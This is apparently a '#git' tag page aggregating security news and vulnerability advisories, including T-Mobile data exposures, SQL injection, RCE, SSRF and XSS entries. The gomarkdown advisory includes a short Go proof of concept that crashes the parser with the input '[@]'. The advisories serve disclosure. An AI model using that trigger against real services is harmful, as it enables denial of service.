Tag
#git
By Waqas Another day, another data security incident at T-Mobile – Because why not! A cybersecurity year without a T-Mobile… This is a post from HackRead.com Read the original post: 90GB of Data Posted on Hacker Forum Linked to T-Mobile Glitch
SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.
### Summary Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. ### Details To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69 ### PoC ```go package main import ( "github.com/gomarkdown/markdown" "github.com/gomarkdown/markdown/parser" ) func main() { ext := parser.CommonExtensions | parser.Attributes | parser.OrderedListStart | parser.SuperSubscript | parser.Mmark p := parser.NewWithExtensions(ext) inp := []byte("[@]") markdown.ToHTML(inp, p, nil) } ``` ```bash $ go run main.go panic: runtime error: index out of range [1] with length 1 goroutine 1 [running]: github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000...
dst-admin v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the userId parameter at /home/playerOperate.
Elasticsearch version 8.5.3 stack overflow proof of concept exploit.
Galaxy is an open-source platform for FAIR data analysis. Prior to version 22.05, Galaxy is vulnerable to server-side request forgery, which allows a malicious to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses. Version 22.05 contains a patch for this issue.
The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.
Taskhub version 2.8.8 suffers from a cross site scripting vulnerability.
Categories: News Categories: Personal Tags: T-Mobile Tags: billing details Tags: data breach Tags: glitch T-Mobile customers recently found other subscribers' information on their online dashboards. (Read more...) The post T-Mobile spills billing information to other customers appeared first on Malwarebytes Labs.
AutomataCI is a template git repository equipped with a native built-in semi-autonomous CI tools. An issue in versions 1.4.1 and below can let a release job reset the git root repository to the first commit. Version 1.5.0 has a patch for this issue. As a workaround, make sure the `PROJECT_PATH_RELEASE` (e.g. `releases/`) directory is manually and actually `git cloned` properly, making it a different git repostiory from the root git repository.